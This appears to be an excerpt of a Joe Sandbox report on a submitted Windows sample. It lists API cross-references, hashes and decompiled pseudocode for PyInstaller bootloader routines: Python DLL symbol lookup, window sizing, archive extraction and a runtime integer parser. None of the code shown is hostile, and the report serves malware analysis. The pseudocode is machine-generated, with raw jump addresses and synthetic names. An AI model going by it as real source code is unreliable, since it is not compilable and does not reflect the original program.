Failed to get address for PyErr_Fetch, xrefs: 00007FF7DA8D41A9
PyObject_GetAttrString, xrefs: 00007FF7DA8D4395
Failed to get address for Py_Initialize, xrefs: 00007FF7DA8D4041
Py_UnbufferedStdioFlag, xrefs: 00007FF7DA8D3F2D
Failed to get address for Py_FrozenFlag, xrefs: 00007FF7DA8D3E5C
PyErr_Occurred, xrefs: 00007FF7DA8D413D
Failed to get address for Py_Finalize, xrefs: 00007FF7DA8D3FF1
PyEval_EvalCode, xrefs: 00007FF7DA8D44D5
Py_NoSiteFlag, xrefs: 00007FF7DA8D3E8D
GetProcAddress, xrefs: 00007FF7DA8D3DFF
Failed to get address for PySys_SetObject, xrefs: 00007FF7DA8D44A1
Py_SetPath, xrefs: 00007FF7DA8D404D
Failed to get address for PyRun_SimpleStringFlags, xrefs: 00007FF7DA8D4401
Py_SetProgramName, xrefs: 00007FF7DA8D409D

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
API String ID: 190572456-3109299426
Opcode ID: 6e6539b2492bcb566142f8ce84d8e1d9cc234e654b2aa916a41ae674904a9854
Instruction ID: 69c80da23c30c5a95c2656c4344378e68197b8a753d53636adcba2003ffa9457
Opcode Fuzzy Hash: 6e6539b2492bcb566142f8ce84d8e1d9cc234e654b2aa916a41ae674904a9854
Instruction Fuzzy Hash: 0442D565A09B0399FE06BB04B8441BCE3A5BF64794BD854B7CC0E462A6FF7CE564C324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D2030 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7DA8D205B
SelectObject.GDI32 ref: 00007FF7DA8D20A2
DrawTextW.USER32 ref: 00007FF7DA8D20C5
SelectObject.GDI32 ref: 00007FF7DA8D20DB
ReleaseDC.USER32 ref: 00007FF7DA8D20EB
MoveWindow.USER32 ref: 00007FF7DA8D213B
MoveWindow.USER32 ref: 00007FF7DA8D217B
MoveWindow.USER32 ref: 00007FF7DA8D21CE
MoveWindow.USER32 ref: 00007FF7DA8D2216

Strings

P%, xrefs: 00007FF7DA8D20AF

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: fb783cecea5857337ba39d7124ac847fd36298f9395065b285019c6a8496f5b4
Instruction ID: a6a84a6cd2b555526f19eabae1f6dcb3cf9e0259ba094f8f78632e3960c0bb38
Opcode Fuzzy Hash: fb783cecea5857337ba39d7124ac847fd36298f9395065b285019c6a8496f5b4
Instruction Fuzzy Hash: B551E7266047A286E624AF26A4581BEF7A1F798B61F404126EFCE43685DF3CD055DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E0178 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF7DA8E0178(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long __r10, void* __r11, long long _a8, intOrPtr _a16, long long _a24) {
				void* _v64;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				long long _v176;
				long long _v184;
				void* __rsi;
				void* __rbp;
				signed int _t144;
				void* _t162;
				signed short _t206;
				signed short _t207;
				signed int _t208;
				signed int _t240;
				intOrPtr _t254;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t263;
				signed short* _t380;
				signed short* _t381;
				signed short* _t383;
				signed short** _t384;
				long long _t385;
				long long* _t388;
				signed short* _t389;
				signed short* _t390;
				signed short** _t394;
				long long* _t395;
				long long* _t396;
				signed short** _t397;
				void* _t398;
				void* _t399;
				signed short* _t404;
				signed short* _t405;
				void* _t407;
				long long _t408;
				signed short* _t409;
				intOrPtr _t410;

				_t407 = __r11;
				_t403 = __r8;
				_t394 = __rdx;
				_t385 = __rbx;
				_a24 = __rbx;
				_a8 = __rcx;
				_t408 =  *__rdx;
				r10d = 0;
				_v64 = _t408;
				r15d = r8d;
				_t397 = __rdx;
				if (_t408 != 0) goto 0xda8e01bf;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0x16;
				E00007FF77FF7DA8E9D00();
				goto 0xda8e01f1;
				if (r15d == 0) goto 0xda8e0209;
				_t4 = _t403 - 2; // 0xe
				if (_t4 - 0x22 <= 0) goto 0xda8e0209;
				_v176 = __rcx;
				r9d = 0;
				 *((char*)(__rcx + 0x30)) = 1;
				r8d = 0;
				 *(__rcx + 0x2c) = 0x16;
				_v184 = __r10;
				E00007FF77FF7DA8E9C34(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
				_t388 = _t397[1];
				if (_t388 == 0) goto 0xda8e0839;
				 *_t388 =  *_t397;
				goto 0xda8e0839;
				_t10 = _t408 + 2; // 0x2
				_t389 = _t10;
				_t144 = r9b & 0xffffffff;
				r14d = r10d;
				 *_t394 = _t389;
				_t262 =  !=  ? _t144 : _t144 | 0x00000002;
				if ((0x0000fffd & _t385 - 0x0000002b) != 0) goto 0xda8e0240;
				_t206 =  *_t389 & 0x0000ffff;
				_t14 =  &(_t389[1]); // 0x4
				_t380 = _t14;
				 *_t397 = _t380;
				_a16 = 0x9f0;
				_v168 = 0xa66;
				_v164 = 0xa70;
				_v160 = 0xae6;
				r8d = 0x660;
				_v156 = 0xaf0;
				_t20 = _t380 - 0x80; // 0x5e0
				r11d = _t20;
				_v152 = 0xb66;
				r9d = 0x6f0;
				_v148 = 0xb70;
				_v144 = 0xc66;
				_v140 = 0xc70;
				_v136 = 0xce6;
				_v132 = 0xcf0;
				_v128 = 0xd66;
				_v124 = 0xd70;
				_v120 = 0xe50;
				_v116 = 0xe5a;
				_v112 = 0xed0;
				_v108 = 0xeda;
				_v104 = 0xf20;
				_v100 = 0xf2a;
				_v96 = 0x1040;
				_v92 = 0x104a;
				_v88 = 0x17e0;
				_v84 = 0x17ea;
				_v80 = 0x1810;
				_v76 = 0xff1a;
				_v72 = 0x19;
				if ((r15d & 0xffffffef) != 0) goto 0xda8e05ab;
				if (_t206 - 0x30 < 0) goto 0xda8e0517;
				if (_t206 - 0x3a >= 0) goto 0xda8e0367;
				goto 0xda8e0512;
				if (_t206 - 0xff10 >= 0) goto 0xda8e0503;
				if (_t206 - r8w < 0) goto 0xda8e0517;
				if (_t206 - 0x66a >= 0) goto 0xda8e038f;
				goto 0xda8e0512;
				if (_t206 - r9w < 0) goto 0xda8e0517;
				if (_t206 - 0x6fa >= 0) goto 0xda8e03ae;
				goto 0xda8e0512;
				if (_t206 - r11w < 0) goto 0xda8e0517;
				if (_t206 - 0x970 >= 0) goto 0xda8e03cd;
				goto 0xda8e0512;
				if (_t206 - (_t206 & 0x0000ffff) - r11d < 0) goto 0xda8e0517;
				if (_t206 - _a16 >= 0) goto 0xda8e03ed;
				goto 0xda8e0512;
				if (_t206 - _v168 < 0) goto 0xda8e0517;
				if (_t206 - _v164 < 0) goto 0xda8e035d;
				_t47 =  &_v160; // 0xae6
				if (_t206 -  *_t47 < 0) goto 0xda8e0517;
				if (_t206 - _v156 < 0) goto 0xda8e035d;
				if (_t206 - _v152 < 0) goto 0xda8e0517;
				if (_t206 - _v148 < 0) goto 0xda8e035d;
				if (_t206 - _v144 < 0) goto 0xda8e0517;
				if (_t206 - _v140 < 0) goto 0xda8e035d;
				if (_t206 - _v136 < 0) goto 0xda8e0517;
				if (_t206 - _v132 < 0) goto 0xda8e035d;
				if (_t206 - _v128 < 0) goto 0xda8e0517;
				if (_t206 - _v124 < 0) goto 0xda8e035d;
				if (_t206 - _v120 < 0) goto 0xda8e0517;
				if (_t206 - _v116 < 0) goto 0xda8e035d;
				if (_t206 - _v112 < 0) goto 0xda8e0517;
				if (_t206 - _v108 < 0) goto 0xda8e035d;
				if (_t206 - _v104 < 0) goto 0xda8e0517;
				if (_t206 - _v100 < 0) goto 0xda8e035d;
				if (_t206 - _v96 < 0) goto 0xda8e0517;
				if (_t206 - _v92 < 0) goto 0xda8e035d;
				if (_t206 - _v88 < 0) goto 0xda8e0517;
				if (_t206 - _v84 < 0) goto 0xda8e035d;
				if ((_t206 & 0x0000ffff) - _v80 - 9 > 0) goto 0xda8e0517;
				goto 0xda8e035d;
				if (_t206 - _v76 >= 0) goto 0xda8e0517;
				if ((_t206 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0xda8e0539;
				_t254 = _v72;
				_t70 = _t389 - 0x41; // 0x6af
				_t71 = _t389 - 0x61; // 0x68f
				_t162 = _t71;
				if (_t70 - _t254 <= 0) goto 0xda8e052f;
				if (_t162 - _t254 > 0) goto 0xda8e059c;
				if (_t162 - _t254 > 0) goto 0xda8e0536;
				_t72 = _t389 - 0x37; // 0x5d9
				if (_t72 != 0) goto 0xda8e059c;
				_t390 =  *_t397;
				r9d = 0xffdf;
				_t255 =  *_t390 & 0x0000ffff;
				_t73 =  &(_t390[1]); // 0xffe1
				_t404 = _t73;
				 *_t397 = _t404;
				_t74 = _t394 - 0x58; // -63
				if ((r9w & _t74) == 0) goto 0xda8e058a;
				 *_t397 = _t390;
				_t166 =  !=  ? r15d : 8;
				r15d =  !=  ? r15d : 8;
				if (_t255 == 0) goto 0xda8e05ab;
				if ( *_t390 == _t255) goto 0xda8e05ab;
				E00007FF77FF7DA8E4394(_t380);
				 *_t380 = 0x16;
				E00007FF77FF7DA8E9D00();
				r10d = 0;
				goto 0xda8e05ab;
				_t207 =  *_t404 & 0x0000ffff;
				_t77 =  &(_t404[1]); // 0xffe3
				_t381 = _t77;
				 *_t397 = _t381;
				goto 0xda8e05a1;
				_t171 =  !=  ? r15d : 0xa;
				r15d = 0xa;
				_t172 = ( !=  ? r15d : 0xa) | 0xffffffff;
				_t79 = (( !=  ? r15d : 0xa) | 0xffffffff) % r15d;
				_t257 = (( !=  ? r15d : 0xa) | 0xffffffff) % r15d;
				r11d = 0x61;
				r9d = 0xa / r15d;
				r12d = 0xff10;
				_t82 = _t407 - 0x31; // 0x5af
				r13d = _t82;
				if (_t207 - r13w < 0) goto 0xda8e077a;
				if (_t207 - 0x3a >= 0) goto 0xda8e05e6;
				goto 0xda8e0775;
				if (_t207 - r12w >= 0) goto 0xda8e0765;
				if (_t207 - 0x660 < 0) goto 0xda8e077a;
				if (_t207 - 0x66a >= 0) goto 0xda8e060d;
				goto 0xda8e0775;
				if (_t207 - 0x6f0 < 0) goto 0xda8e077a;
				_t83 =  &(_t381[5]); // 0x6fa
				if (_t207 - _t83 >= 0) goto 0xda8e062d;
				goto 0xda8e0775;
				if (_t207 - 0x966 < 0) goto 0xda8e077a;
				_t84 =  &(_t381[5]); // 0x970
				if (_t207 - _t84 < 0) goto 0xda8e0623;
				_t85 =  &(_t390[0x3b]); // 0x9e6
				if (_t207 - _t85 < 0) goto 0xda8e077a;
				if (_t207 - _a16 < 0) goto 0xda8e0623;
				if (_t207 - _v168 < 0) goto 0xda8e077a;
				if (_t207 - _v164 < 0) goto 0xda8e0623;
				if (_t207 - _v160 < 0) goto 0xda8e077a;
				if (_t207 - _v156 < 0) goto 0xda8e0623;
				if (_t207 - _v152 < 0) goto 0xda8e077a;
				if (_t207 - _v148 < 0) goto 0xda8e0623;
				if (_t207 - _v144 < 0) goto 0xda8e077a;
				if (_t207 - _v140 < 0) goto 0xda8e0623;
				if (_t207 - _v136 < 0) goto 0xda8e077a;
				if (_t207 - _v132 < 0) goto 0xda8e0623;
				if (_t207 - _v128 < 0) goto 0xda8e077a;
				if (_t207 - _v124 < 0) goto 0xda8e0623;
				if (_t207 - _v120 < 0) goto 0xda8e077a;
				if (_t207 - _v116 < 0) goto 0xda8e0623;
				if (_t207 - _v112 < 0) goto 0xda8e077a;
				if (_t207 - _v108 < 0) goto 0xda8e0623;
				if (_t207 - _v104 < 0) goto 0xda8e077a;
				if (_t207 - _v100 < 0) goto 0xda8e0623;
				if (_t207 - _v96 < 0) goto 0xda8e077a;
				if (_t207 - _v92 < 0) goto 0xda8e0623;
				if (_t207 - _v88 < 0) goto 0xda8e077a;
				if (_t207 - _v84 < 0) goto 0xda8e0623;
				if ((_t207 & 0x0000ffff) - _v80 - 9 > 0) goto 0xda8e077a;
				goto 0xda8e0775;
				if (_t207 - _v76 >= 0) goto 0xda8e077a;
				if ((_t207 & 0x0000ffff) - r12d != 0xffffffff) goto 0xda8e07ae;
				_t240 = _t207 & 0x0000ffff;
				if (_t240 - 0x41 < 0) goto 0xda8e0787;
				if (_t240 - 0x5a <= 0) goto 0xda8e0792;
				if (_t240 - r11d < 0) goto 0xda8e07ab;
				if (_t207 - 0x7a > 0) goto 0xda8e07ab;
				if ((_t207 & 0x0000ffff) - r11w - _v72 > 0) goto 0xda8e07a6;
				goto 0xda8e07ae;
				_t405 =  *_t397;
				if ((_t240 + 0x1ffffffa9 | 0xffffffff) - r15d >= 0) goto 0xda8e07ee;
				_t208 =  *_t405 & 0x0000ffff;
				_t259 = _t381 + _t390;
				r14d = _t259;
				_t117 =  &(_t405[1]); // 0x12
				 *_t397 = _t117;
				_t263 = ( !=  ? _t144 : _t144 | 0x00000002) | (r10d & 0xffffff00 | _t259 - r14d * r15d > 0x00000000 | r10d & 0xffffff00 | r14d - r9d > 0x00000000) << 0x00000002 | 0x00000008;
				goto 0xda8e05cb;
				_t409 = _v64;
				_t119 = _t405 - 2; // 0xe
				_t383 = _t119;
				_t410 = _a8;
				 *_t397 = _t383;
				if (_t208 == 0) goto 0xda8e0824;
				if ( *_t383 == _t208) goto 0xda8e0824;
				E00007FF77FF7DA8E4394(_t383);
				 *_t383 = 0x16;
				E00007FF77FF7DA8E9D00();
				if ((sil & 0x00000008) != 0) goto 0xda8e0840;
				_t384 = _t397[1];
				 *_t397 = _t409;
				if (_t384 == 0) goto 0xda8e0839;
				 *_t384 = _t409;
				goto 0xda8e08d2;
				r8d = 0x80000000;
				_t124 = _t405 - 1; // 0xf
				r9d = _t124;
				if ((sil & 0x00000004) == 0) goto 0xda8e0859;
				goto 0xda8e0877;
				if ((sil & 0x00000001) == 0) goto 0xda8e08b8;
				if ((bpl & sil) == 0) goto 0xda8e086b;
				if (r14d - r8d <= 0) goto 0xda8e08bd;
				goto 0xda8e0870;
				if (r14d - r9d <= 0) goto 0xda8e08c0;
				 *((char*)(_t410 + 0x30)) = 1;
				 *((intOrPtr*)(_t410 + 0x2c)) = 0x22;
				if ((_t263 & 0x00000001) != 0) goto 0xda8e0890;
				r14d = r14d | 0xffffffff;
				goto 0xda8e08c0;
				_t395 = _t397[1];
				if ((0x00000002 & _t263) == 0) goto 0xda8e08a8;
				if (_t395 == 0) goto 0xda8e08a3;
				 *_t395 =  *_t397;
				goto 0xda8e08d2;
				if (_t395 == 0) goto 0xda8e08b3;
				 *_t395 =  *_t397;
				goto 0xda8e08d2;
				if ((bpl & sil) == 0) goto 0xda8e08c0;
				r14d =  ~r14d;
				_t396 = _t397[1];
				if (_t396 == 0) goto 0xda8e08cf;
				 *_t396 =  *_t397;
				return r14d;
			}

0x7ff7da8e0178
0x7ff7da8e0178
0x7ff7da8e0178
0x7ff7da8e0178
0x7ff7da8e0178
0x7ff7da8e017d
0x7ff7da8e0194
0x7ff7da8e0197
0x7ff7da8e019a
0x7ff7da8e01a2
0x7ff7da8e01a5
0x7ff7da8e01ab
0x7ff7da8e01ad
0x7ff7da8e01b2
0x7ff7da8e01b8
0x7ff7da8e01bd
0x7ff7da8e01c2
0x7ff7da8e01c4
0x7ff7da8e01cb
0x7ff7da8e01cd
0x7ff7da8e01d2
0x7ff7da8e01d5
0x7ff7da8e01d9
0x7ff7da8e01dc
0x7ff7da8e01e7
0x7ff7da8e01ec
0x7ff7da8e01f1
0x7ff7da8e01f8
0x7ff7da8e0201
0x7ff7da8e0204
0x7ff7da8e020e
0x7ff7da8e020e
0x7ff7da8e0213
0x7ff7da8e0217
0x7ff7da8e021c
0x7ff7da8e022b
0x7ff7da8e0234
0x7ff7da8e0236
0x7ff7da8e0239
0x7ff7da8e0239
0x7ff7da8e023d
0x7ff7da8e0240
0x7ff7da8e0250
0x7ff7da8e025d
0x7ff7da8e026a
0x7ff7da8e0272
0x7ff7da8e0278
0x7ff7da8e0280
0x7ff7da8e0280
0x7ff7da8e0284
0x7ff7da8e028c
0x7ff7da8e0292
0x7ff7da8e029a
0x7ff7da8e02a2
0x7ff7da8e02aa
0x7ff7da8e02b2
0x7ff7da8e02ba
0x7ff7da8e02c2
0x7ff7da8e02ca
0x7ff7da8e02d2
0x7ff7da8e02da
0x7ff7da8e02e2
0x7ff7da8e02ea
0x7ff7da8e02f2
0x7ff7da8e02fa
0x7ff7da8e0302
0x7ff7da8e030a
0x7ff7da8e0315
0x7ff7da8e0320
0x7ff7da8e032b
0x7ff7da8e0336
0x7ff7da8e0348
0x7ff7da8e0351
0x7ff7da8e035b
0x7ff7da8e0362
0x7ff7da8e036a
0x7ff7da8e0374
0x7ff7da8e0382
0x7ff7da8e038a
0x7ff7da8e0393
0x7ff7da8e03a1
0x7ff7da8e03a9
0x7ff7da8e03b2
0x7ff7da8e03c0
0x7ff7da8e03c8
0x7ff7da8e03d0
0x7ff7da8e03de
0x7ff7da8e03e8
0x7ff7da8e03f4
0x7ff7da8e03ff
0x7ff7da8e0405
0x7ff7da8e040c
0x7ff7da8e0417
0x7ff7da8e0424
0x7ff7da8e042f
0x7ff7da8e043c
0x7ff7da8e0447
0x7ff7da8e0454
0x7ff7da8e045f
0x7ff7da8e046c
0x7ff7da8e0477
0x7ff7da8e0484
0x7ff7da8e048f
0x7ff7da8e049c
0x7ff7da8e04a3
0x7ff7da8e04b0
0x7ff7da8e04b7
0x7ff7da8e04c4
0x7ff7da8e04cb
0x7ff7da8e04db
0x7ff7da8e04e5
0x7ff7da8e04fc
0x7ff7da8e04fe
0x7ff7da8e050b
0x7ff7da8e0515
0x7ff7da8e0517
0x7ff7da8e0521
0x7ff7da8e0526
0x7ff7da8e0526
0x7ff7da8e0529
0x7ff7da8e052d
0x7ff7da8e0531
0x7ff7da8e0536
0x7ff7da8e053b
0x7ff7da8e053d
0x7ff7da8e0540
0x7ff7da8e0546
0x7ff7da8e0549
0x7ff7da8e0549
0x7ff7da8e054d
0x7ff7da8e0550
0x7ff7da8e0557
0x7ff7da8e055c
0x7ff7da8e0564
0x7ff7da8e0568
0x7ff7da8e056e
0x7ff7da8e0573
0x7ff7da8e0575
0x7ff7da8e057a
0x7ff7da8e0580
0x7ff7da8e0585
0x7ff7da8e0588
0x7ff7da8e058a
0x7ff7da8e058e
0x7ff7da8e058e
0x7ff7da8e0592
0x7ff7da8e059a
0x7ff7da8e05a4
0x7ff7da8e05a8
0x7ff7da8e05ad
0x7ff7da8e05b0
0x7ff7da8e05b0
0x7ff7da8e05b3
0x7ff7da8e05be
0x7ff7da8e05c1
0x7ff7da8e05c7
0x7ff7da8e05c7
0x7ff7da8e05cf
0x7ff7da8e05d9
0x7ff7da8e05e1
0x7ff7da8e05ea
0x7ff7da8e05f3
0x7ff7da8e0601
0x7ff7da8e0608
0x7ff7da8e0615
0x7ff7da8e061b
0x7ff7da8e0621
0x7ff7da8e0628
0x7ff7da8e0635
0x7ff7da8e063b
0x7ff7da8e0641
0x7ff7da8e0643
0x7ff7da8e0649
0x7ff7da8e0657
0x7ff7da8e0660
0x7ff7da8e066b
0x7ff7da8e0674
0x7ff7da8e067f
0x7ff7da8e0688
0x7ff7da8e0693
0x7ff7da8e069c
0x7ff7da8e06a7
0x7ff7da8e06b4
0x7ff7da8e06bf
0x7ff7da8e06cc
0x7ff7da8e06d7
0x7ff7da8e06e4
0x7ff7da8e06ef
0x7ff7da8e06fc
0x7ff7da8e0703
0x7ff7da8e0710
0x7ff7da8e0717
0x7ff7da8e0724
0x7ff7da8e072b
0x7ff7da8e073b
0x7ff7da8e0745
0x7ff7da8e075c
0x7ff7da8e0763
0x7ff7da8e076d
0x7ff7da8e0778
0x7ff7da8e077a
0x7ff7da8e0780
0x7ff7da8e0785
0x7ff7da8e078a
0x7ff7da8e0790
0x7ff7da8e07a1
0x7ff7da8e07a9
0x7ff7da8e07ae
0x7ff7da8e07b4
0x7ff7da8e07b6
0x7ff7da8e07c1
0x7ff7da8e07d2
0x7ff7da8e07da
0x7ff7da8e07e4
0x7ff7da8e07e7
0x7ff7da8e07e9
0x7ff7da8e07ee
0x7ff7da8e07f6
0x7ff7da8e07f6
0x7ff7da8e07fa
0x7ff7da8e0807
0x7ff7da8e080d
0x7ff7da8e0812
0x7ff7da8e0814
0x7ff7da8e0819
0x7ff7da8e081f
0x7ff7da8e0828
0x7ff7da8e082a
0x7ff7da8e082e
0x7ff7da8e0834
0x7ff7da8e0836
0x7ff7da8e083b
0x7ff7da8e0840
0x7ff7da8e0846
0x7ff7da8e0846
0x7ff7da8e084e
0x7ff7da8e0857
0x7ff7da8e085d
0x7ff7da8e0862
0x7ff7da8e0867
0x7ff7da8e0869
0x7ff7da8e086e
0x7ff7da8e0879
0x7ff7da8e087e
0x7ff7da8e0888
0x7ff7da8e088a
0x7ff7da8e088e
0x7ff7da8e0890
0x7ff7da8e0896
0x7ff7da8e089b
0x7ff7da8e08a0
0x7ff7da8e08a6
0x7ff7da8e08ab
0x7ff7da8e08b0
0x7ff7da8e08b6
0x7ff7da8e08bb
0x7ff7da8e08bd
0x7ff7da8e08c0
0x7ff7da8e08c7
0x7ff7da8e08cc
0x7ff7da8e08ec

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E01B8
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E0580
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E081F

Strings

f, xrefs: 00007FF7DA8E02BA
p, xrefs: 00007FF7DA8E025D
p, xrefs: 00007FF7DA8E02C2
f, xrefs: 00007FF7DA8E0250
f, xrefs: 00007FF7DA8E0405

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
Instruction ID: 2626698016375ed4ef662938865a372bb064202d945700eb323fef4a9af06217
Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
Instruction Fuzzy Hash: 4912B261E4C1C3C6FB216A14A41437DE271FBA0751FC84877EED9465C6DB3EEAA08B60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D12B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E00007FF77FF7DA8D12B0(long long* __rcx, void* __rdx) {
				long long _t8;
				void* _t15;
				void* _t16;
				void* _t17;

				_t8 =  *((intOrPtr*)(__rcx));
				_t15 = __rdx;
				if (_t8 != 0) goto 0xda8d12f8;
				E00007FF77FF7DA8D3C90(_t8, __rcx + 0x78, "rb");
				 *__rcx = _t8;
				if (_t8 != 0) goto 0xda8d12f8;
				E00007FF77FF7DA8D2770(_t8, "Failed to extract %s: failed to open archive file!\n", _t15 + 0x12, _t16, _t17);
				return 0;
			}

0x7ff7da8d12b8
0x7ff7da8d12bb
0x7ff7da8d12c4
0x7ff7da8d12d1
0x7ff7da8d12d6
0x7ff7da8d12dc
0x7ff7da8d12e9
0x7ff7da8d12f7

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7DA8D134C
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7DA8D13E2
fread, xrefs: 00007FF7DA8D13E9
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7DA8D1312
